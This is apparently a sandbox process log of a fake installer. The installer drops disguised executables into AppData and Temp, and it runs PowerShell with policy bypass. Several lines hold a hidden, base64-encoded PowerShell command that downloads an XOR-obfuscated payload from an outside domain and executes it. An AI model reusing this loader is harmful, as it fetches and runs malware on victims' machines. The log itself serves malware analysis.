C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\x32_x64_installer.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4140 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\x32_x64_installer\" -spe -an -ai#7zMap25084:92:7zEvent26371

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\x32_x64_installer\setup\" -spe -an -ai#7zMap24552:104:7zEvent9109

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\x32_x64_installer\setup\setup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7F445D1A15E1E8DFF56A52947A4EF254

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssEFC8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiEFB5.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrEFB6.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrEFB7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AaQBpAGcAZwBnAGsAawBsAC4AbQBvAG4AcwB0AGUAcgAvAG4AZQB3AGQAcgBvAHAALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x2c4,0x2c8,0x2cc,0x2c0,0x35c,0x7ff8a4342e98,0x7ff8a4342ea4,0x7ff8a4342eb0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2280 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2956 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3088 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3428 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3372 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3892 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=5012 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:2

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5280 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5372 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5568 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4848 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4724 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3340 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4132 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5828 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5892 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6152 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6608 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6608 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6784 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6792 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5236 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=3624 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6040 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6568 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x50c 0x534

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4204 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE

"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\locale\pureviolet.pot"

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe"

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AaQBpAGcAZwBnAGsAawBsAC4AbQBvAG4AcwB0AGUAcgAvAG4AZQB3AGQAcgBvAHAALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\gPbvjrqJdNjoBNl\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\gPbvjrqJdNjoBNl\svchost.exe"

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4912 -ip 4912

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AaQBpAGcAZwBnAGsAawBsAC4AbQBvAG4AcwB0AGUAcgAvAG4AZQB3AGQAcgBvAHAALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AaQBpAGcAZwBnAGsAawBsAC4AbQBvAG4AcwB0AGUAcgAvAG4AZQB3AGQAcgBvAHAALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 4912 -ip 4912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2056

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4912 -ip 4912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2092

C:\Users\Admin\AppData\Local\Temp\b4Tvo7dAqteQ0zL\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\b4Tvo7dAqteQ0zL\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\UhwuE7JmPUqUfRj\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\UhwuE7JmPUqUfRj\svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AaQBpAGcAZwBnAGsAawBsAC4AbQBvAG4AcwB0AGUAcgAvAG4AZQB3AGQAcgBvAHAALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Users\Admin\AppData\Local\Temp\Ko0JPYBqUfWBZzu\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\Ko0JPYBqUfWBZzu\svchost.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3456 -ip 3456

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2496 -ip 2496

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 2056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 2064

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3456 -ip 3456

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2496 -ip 2496

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 2060

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2c8,0x2c4,0x7ff8a4342e98,0x7ff8a4342ea4,0x7ff8a4342eb0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2332 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2376 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:3

